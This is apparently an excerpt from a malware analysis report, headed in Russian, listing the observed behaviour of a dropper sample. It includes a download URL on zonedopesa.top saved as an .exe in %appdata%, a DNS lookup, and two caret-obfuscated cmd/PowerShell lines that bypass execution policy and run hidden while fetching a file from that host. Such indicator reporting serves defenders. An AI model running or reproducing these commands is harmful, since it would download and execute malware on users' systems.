Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POweRSHELL.exE -E^xe^CuTI^OnPo^l^icY b^YpAsS -no^pROfIlE -W^iNdOw^S^TY^LE hIddEn^ ^(N^E^W-^obJeCT ^sy^StEm^.Ne^t.^WEb^CLiEN^t^).^d^o^W^nLO^AD^FI^Le^('http://www.zonedopesa.top/read...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /C "POweRSHELL.exE -E^xe^CuTI^OnPo^l^icY b^YpAsS -no^pROfIlE -W^iNdOw^S^TY^LE hIddEn^ ^(N^E^W-^obJeCT ^sy^StEm^.Ne^t.^WEb^CLiEN^t^).^d^o^W^nLO^AD^FI^Le^('http://www.zonedopesa.top/read...' (со скрытым окном)